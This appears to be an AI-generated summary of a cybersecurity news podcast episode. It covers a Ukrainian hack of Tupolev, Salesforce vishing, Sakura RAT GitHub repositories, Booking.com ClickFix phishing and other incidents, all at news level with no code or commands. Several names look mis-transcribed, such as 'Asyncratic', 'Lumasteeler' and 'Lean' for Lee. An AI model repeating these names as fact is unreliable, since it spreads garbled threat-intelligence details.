Cyber Security Headlines: Russian Bomber Maker Popped, Vishing Targets Salesforce, MS Helps Out Governments Hosted by CISO Series | Released on June 5, 2025

In this episode of "Cybersecurity Headlines," Rich Stroffelino delves into the latest developments in the information security landscape. From state-sponsored cyberattacks to evolving phishing techniques and corporate defenses, this episode provides a comprehensive overview of critical events shaping cybersecurity today.

1. Ukraine Claims Cyberattack on Russian Bomber Maker

Timestamp: [00:06]

Ukraine's HUR intelligence agency has announced a successful cyber attack against the Russian state-owned aircraft manufacturer, Tupolev. According to the agency, over 4 gigabytes of data were accessed, including internal communications, meeting notes, and servicing records for strategic bombers. Additionally, the agency asserted that Tupolev's website was vandalized and remains offline at the time of recording.

Rich Stroffelino highlights the timing of this cyber offensive, noting, “This comes days after Ukraine launched a drone offensive against Russian air bases, damaging over 40 long-range bombers” (00:12). This series of attacks underscores the escalating cyber dimensions of geopolitical conflicts.

Key Points:

• Data Accessed: Internal communications, meeting notes, servicing records.
• Website Vandalism: Tupolev's site remains down.
• Context: Follows Ukraine's drone attacks on Russian air bases.

2. Vishing Campaign Targets Salesforce

Timestamp: [00:25]

Researchers from Google's Threat Intelligence Group have identified a sophisticated vishing (voice phishing) campaign orchestrated by the threat group UNC65. This group has demonstrated consistent success in breaching corporate networks by impersonating IT support personnel to trick employees into downloading malicious software.

Rich explains, “These vishing attacks attempt to get staff to load a modified version of Salesforce's Data Loader, usually used for bulk data access on the platform” (00:30). Once installed, the tool grants attackers access to Salesforce environments, allows data exfiltration, and facilitates lateral movement within the network. In some cases, organizations have faced extortion attempts months post-breach, hinting at possible collaborations with other cybercriminal entities.

Key Points:

• Threat Group: UNC65.
• Tactics: Impersonation of IT support, social engineering via phone calls.
• Malware Used: Modified Salesforce Data Loader.
• Consequences: Data exfiltration, network pivoting, extortion attempts.

3. Microsoft Lends a Hand to European Governments

Timestamp: [01:15]

In response to the increasing cyber threats in Europe, Microsoft has launched a new program aimed at fortifying the cybersecurity defenses of European governments. The initiative focuses on three primary areas:

1. AI-Based Threat Intelligence Sharing: Enhancing the dissemination of threat intelligence using advanced AI to identify and respond to emerging threats swiftly.
2. Investment in Resilience: Allocating resources to bolster the resilience of governmental infrastructures against cyberattacks.
3. Expanding Partnerships: Collaborating more closely with European governments to detect and dismantle threat networks effectively.

Rich comments, “This program will include intelligence sharing on emerging threats and help with disrupting attacks already underway” (01:20). By leveraging Microsoft's extensive resources and expertise, European governments are better equipped to handle the dynamic nature of cyber threats.

Key Points:

• Program Focus: AI-based threat intelligence, resilience investment, partnership expansion.
• Objective: Strengthen defenses, disrupt ongoing attacks, enhance detection capabilities.

4. Lee Enterprises Data Breach Impacts Over 39,000 Individuals

Timestamp: [02:00]

Lee Enterprises, a prominent newspaper group, experienced a significant data breach in February that led to widespread system outages across its network. In a recent notification to Maine's Attorney General, the company revealed that personally identifiable information (PII) of 39,779 individuals was compromised. While the specifics of the data involved remain vague, the breach was attributed to the Quillen Ransomware Group, which claimed responsibility on its leak site, stating they had stolen over 350 GB of data.

Rich notes, “Although it was light on what this actually included, Lean never attributed the attack to a threat group. But the Quillen Ransomware Group took credit...” (02:05). This incident highlights the persistent threat posed by ransomware groups targeting media organizations.

Key Points:

• Affected Individuals: 39,779.
• Data Compromised: PII (details unspecified).
• Attribution: Quillen Ransomware Group claimed responsibility.

5. Replay Attacks Bypass Deepfake Detection

Timestamp: [03:00]

A groundbreaking study by Resemble AI and European academic researchers has unveiled a method to circumvent existing audio deepfake detection systems, termed as a "replay attack." This technique involves generating synthetic speech, playing it aloud, and subsequently re-recording it in environments with actual background noise.

Rich explains, “This approach increased error rates from 4.7% to 18.2%” (03:05). By introducing real-world ambient sounds, the replayed audio removes key artifacts that deepfake detectors rely on, making synthetic speech harder to identify. Although retraining models with specific room tones marginally improved detection, the study underscores the need for more robust deepfake defense mechanisms.

Key Points:

• Method: Synthetic speech played and re-recorded with background noise.
• Impact: Increased detection error rates significantly.
• Implications: Necessitates advanced detection strategies to counteract replay attacks.

6. Sakura RAT Malware Unveiled

Timestamp: [04:00]

Sophos researchers have uncovered a malicious piece of software known as Sakura RAT, initially appearing to be dysfunctional. Upon closer inspection, the malware contains a pre-built event that triggers the download of an additional backdoor during compilation. Tracing an embedded email within the malware led to the discovery of 133 repositories hosting similar software on GitHub.

Rich details, “The threat actors auto-generated commits with GitHub Actions, following a strict pattern across projects that shows significant coordination” (04:05). The payloads distributed through these repositories vary, ranging from backdoors to tools like Asyncratic and Lumasteeler, covering a spectrum from game cheats to hacking utilities. This coordinated effort by threat actors aims to mask their activities by maintaining the illusion of active project maintenance.

Key Points:

• Malware Name: Sakura RAT.
• Distribution Method: GitHub repositories with coordinated commits.
• Payloads: Diverse, including backdoors and hacking tools.
• Threat Actor Tactics: Masking operations through auto-generated commits and varied software offerings.

7. Booking.com Spoofed Phishing Campaign

Timestamp: [05:00]

Cofense Intelligence has identified an ongoing phishing campaign spoofing Booking.com that has been active since at least November 2024. Targeting hotel staff, the campaign sends emails impersonating guest-related queries with time-sensitive prompts. These messages utilize ClickFix, presenting themselves as CAPTCHA challenges to trick recipients into downloading malware.

Rich states, “These messages use ClickFix to pose as a captcha, ultimately being used to start a malware download and install a RAT or infostealer” (05:05). Additionally, the campaign employs cookie consent banners and Cloudflare-style site walls as deceptive gateways to payload downloads, enhancing the sophistication of their phishing attempts.

Key Points:

• Target: Hotel staff.
• Tactics: Impersonation of guest queries, time-sensitive lures, ClickFix as CAPTCHA.
• Payloads: Remote Access Trojans (RATs) and infostealers.
• Additional Techniques: Use of cookie consent banners and site walls for malware distribution.

8. FBI Warns About NFT Airdrop Phishing Scheme

Timestamp: [06:00]

The FBI has issued a warning regarding a new phishing scheme exploiting Non-Fungible Tokens (NFTs) operating on the Hedera Hashgraph network. In this scam, threat actors send unsolicited NFTs to victims' wallets accompanied by memos urging them to click on a URL to claim a reward. Instead of receiving legitimate rewards, victims are redirected to phishing pages designed to steal wallet seed phrases and passwords.

Rich elaborates, “This campaign also uses standard phishing emails, social media ads, and fake sites to draw in victims” (06:05). The FBI advises individuals to verify NFT drops through official channels rather than responding to unsolicited communications. Hedera Hashgraph, introduced in 2018, is noted for its efficiency and scalability compared to traditional blockchain technologies, making it a target for such schemes.

Key Points:

• Scheme: Unsolicited NFT airdrops with malicious URLs.
• Targets: Cryptocurrency wallet holders.
• Techniques: Phishing emails, social media ads, fake websites.
• Prevention: Verify NFT transactions through official sources.

Conclusion

Rich Stroffelino wraps up the episode by emphasizing the critical role of threat intelligence in fostering a proactive security posture within organizations. He states, “We're increasingly using threat intelligence to move our organizations to a more proactive security posture, making them more resilient against cyber attacks” (06:30). The discussion underscores the importance of integrating efficient and effective threat intelligence mechanisms to enhance Security Operations Centers (SoCs) and overall organizational resilience against the ever-evolving cyber threat landscape.

Key Takeaways:

• Proactive Security: Leveraging threat intelligence for anticipation and mitigation of cyber threats.
• Collaboration: Importance of partnerships between governments and private entities.
• Continuous Improvement: Adapting detection and defense mechanisms to counter sophisticated attack methods.

For more in-depth analysis and daily cybersecurity stories, listeners are encouraged to visit CISOseries.com.

Reporting from the CISO Series, Rich Stroffelino encourages listeners to engage and share their thoughts by reaching out via feedback@cisoseries.com.